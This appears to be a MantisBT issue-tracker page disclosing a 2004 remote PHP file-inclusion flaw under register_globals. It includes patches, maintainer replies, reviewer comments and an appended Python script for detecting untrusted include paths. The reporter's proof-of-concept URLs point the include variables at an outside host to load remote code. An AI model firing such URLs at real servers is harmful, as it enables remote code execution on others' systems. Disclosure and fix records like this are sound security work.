View Issue Details

ID: 0004239
Project: mantisbt
Category: security
View Status: public
Last Update: 2006-10-09 11:54
Reporter: joxeanpiti
Assigned To: grangeway
Priority: normal
Severity: major
Reproducibility: sometimes
Status: closed
Resolution: fixed
Product Version: 0.19.0a2
Fixed in Version: 0.19.0rc1
Summary: 0004239: Remote PHP Code execution
Description

If the Register_Global directive is set to on, an attacker may execute arbitrary PHP code.

Additional Information

If the REGISTER_GLOBAL variable is set we can execute arbitrary PHP code by overwriting the global variable $t_core_dir with our desired URL (for example http://localhost/mantis/core/bug_api.php?t_core_dir=http://fucking.site.com/)

The following files are vulnerable:

bug_api.php -> Line 22 (using $t_core_path)
relationship_api.php -> Line 14 (using $t_core_dir)

Tags: No tags attached.
Attached Files
new.patch (224 bytes)   
diff ./bug_api.php ../core/bug_api.php
22d21
< 	$t_core_path=$t_core_dir;
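Review bot: The added line 22, $t_core_path=$t_core_dir;, only moves the problem unless $t_core_dir has already been assigned from a trusted value earlier in bug_api.php, and this hunk does not show that. With register_globals on, an unset $t_core_dir is as request-controllable as $t_core_path was. Assign from dirname( __FILE__ ).DIRECTORY_SEPARATOR here as well, or use $t_core_dir directly in the require_once and drop the second variable.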
diff ./relationship_api.php ../core/relationship_api.php
13c13
< 	$t_core_dir = dirname( __FILE__ ).DIRECTORY_SEPARATOR;
---
> 
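Review bot: The file order on the diff line for relationship_api.php puts the patched copy first, so the new assignment at line 13 appears as a "<" line and the blank line it replaces as ">". Regenerate the patch with the original file first, in unified format with context, so it applies with patch and the neighbouring require_once lines are visible. The assignment itself should remain unconditional and stay ahead of the use at line 14 named in the report.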
609c609
< ?>
---
> ?>

Activities

grangeway

2004-08-01 12:26

reporter   ~0006530

Both of these issues have now been fixed in CVS. Thanks for the report. If you find anything else, please let us know.

joxeanpiti

2004-08-01 13:16

reporter   ~0006534

Last edited: 2004-08-01 13:25

Not corrected in version Mantis 0.19.0-CVS, sorry! I downloaded it at: Sun Aug 1 20:17:27 2004.

To try it:

1.- http://localhost/mantis/core/bug_api.php?t_core_path=http://fucking.site.com/

Problem in file core/bug_api.php at line 22.

2.- http://localhost/mantis/core/relationship_api.php?t_core_dir=http://fucking.site.com/

Sorry for the insistence.

edited on: 08-01-04 13:25

joxeanpiti

2004-08-01 13:24

reporter   ~0006535

I uploaded a simple patch. This works for me.

grangeway

2004-08-01 13:29

reporter   ~0006536

SourceForge viewcvs etc. tend to lag behind real CVS commits. The commits I did are listed below, which seem to match your diff file. Just a matter of waiting for sf.net to catch up with life :)

bug_api.php
@@ -19,7 +19,7 @@
require_once( $t_core_dir . 'sponsorship_api.php' );

# MASC RELATIONSHIP
  • require_once( $t_core_path.'relationship_api.php' );
  • require_once( $t_core_dir.'relationship_api.php' );

    MASC RELATIONSHIP
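Review bot: The changed require_once still builds its path from a variable, and nothing in this hunk prevents core/bug_api.php from being requested directly, which is how the URL in the report reaches it. A guard at the top of each core file that exits when the file is not included from the application entry point, or a web-server rule denying requests under core/, would remove the dependency on every include variable being set correctly.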

and to relationship API:

Relationship API

  • $t_core_dir = dirname( FILE ).DIRECTORY_SEPARATOR;
  • require_once( $t_core_dir . 'collapse_api.php' );

    MASC RELATIONSHIP

joxeanpiti

2004-08-01 13:31

reporter   ~0006537

Last edited: 2004-08-01 13:31

Sorry :)

edited on: 08-01-04 13:31

grangeway

2004-08-01 13:40

reporter   ~0006538

no problem :)

Related Changesets

MantisBT: master 42aefcbf

2004-08-01 13:28

Paul Richards


Fix 0004239: Remote PHP Code execution

git-svn-id: http://mantisbt.svn.sourceforge.net/svnroot/mantisbt/trunk@2790 f5dc347c-c33d-0410-90a0-b07cc1902cb9
Affected Issues
0004239
mod - core/bug_api.php
mod - core/relationship_api.php
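
An added example (not part of the original issue or of MantisBT's code): a small Python audit check for the pattern reported here, an include path built from a variable that the file never sets itself, which register_globals lets a request supply. The PHP samples are constructed from the lines quoted on this page, and the line-based regex matching is a simplifying assumption, not a PHP parser.

```python
import re

# include/require statement; group 1 is the path expression up to the ';'
INCLUDE_RE = re.compile(r'(?<![\w$])(?:require|include)(?:_once)?\b\s*([^;]*);', re.I)
# "$name = expr;" (not ==, => or .=); group 2 is the right-hand side
ASSIGN_RE = re.compile(r'\$(\w+)\s*=(?![=>])([^;]*);')
VAR_RE = re.compile(r'\$(\w+)')
COMMENT_RE = re.compile(r'^\s*(?:#|//).*')  # whole-line comments only

def untrusted_includes(php_source):
    """Return [(line_no, variable)] for include paths that use a variable the
    file has not itself set from a request-independent expression."""
    trusted, findings = set(), []
    for line_no, raw in enumerate(php_source.splitlines(), 1):
        line = COMMENT_RE.sub('', raw)
        for path_expr in INCLUDE_RE.findall(line):
            findings += [(line_no, v) for v in VAR_RE.findall(path_expr) if v not in trusted]
        for name, rhs in ASSIGN_RE.findall(line):
            # Trusted only when every variable on the right-hand side is trusted,
            # so an alias of a variable the file never set stays untrusted.
            if all(v in trusted for v in VAR_RE.findall(rhs)):
                trusted.add(name)
            else:
                trusted.discard(name)
    return findings

# Constructed PHP samples modeled on the lines quoted in this issue (not the real files).
RELATIONSHIP_API_BEFORE = """<?php
# Relationship API
require_once( $t_core_dir . 'collapse_api.php' );
"""
RELATIONSHIP_API_AFTER = """<?php
# Relationship API
$t_core_dir = dirname( __FILE__ ).DIRECTORY_SEPARATOR;
require_once( $t_core_dir . 'collapse_api.php' );
"""
BUG_API_ALIAS_ONLY = """<?php
$t_core_path=$t_core_dir;
require_once( $t_core_path.'relationship_api.php' );
"""

if __name__ == "__main__":
    for label in ("RELATIONSHIP_API_BEFORE", "RELATIONSHIP_API_AFTER", "BUG_API_ALIAS_ONLY"):
        print(label, untrusted_includes(globals()[label]))
```

The check is file-local, so a file that relies on its includer to set the variable is reported too, which corresponds to the direct-request case described in this issue.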